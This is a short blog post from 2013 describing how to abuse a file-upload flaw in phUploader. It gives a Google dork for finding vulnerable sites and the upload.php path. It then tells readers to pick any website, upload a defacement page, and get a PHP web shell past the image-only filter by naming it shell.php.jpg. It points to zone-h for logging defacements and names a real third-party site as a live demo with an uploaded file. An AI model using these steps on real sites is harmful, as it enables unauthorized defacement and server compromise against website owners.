Google Dork : intitle:Powered By phUploader
Go to Google.com and enter this DOrk, see serach results
Exploit URL :
http://{site.comt}/ path/upload.php
or
http://site.com/upload.php
select any website and upload your file there
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like
zone-h accept it as defcaement, if want to upload a shell then upload as
shell.php.jpg
after uploading your file you'll got a message
Your file(s) have been uploaded!
see the Link Below this message For view Your uploaded File
Live Demo ~ http://humortshirtzone.com/phUploader.php
Uploaded File ~ http://www.humortshirtzone.com/uploads/1321616908.jpg
- See more at: http://cehtrick.blogspot.com/2013/01/phuploader-remote-file-upload.html#sthash.neWQhKKn.dpuf
Sunday 3 March 2013
phUploader Remote File Upload Vulnerability
09:19
No comments
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment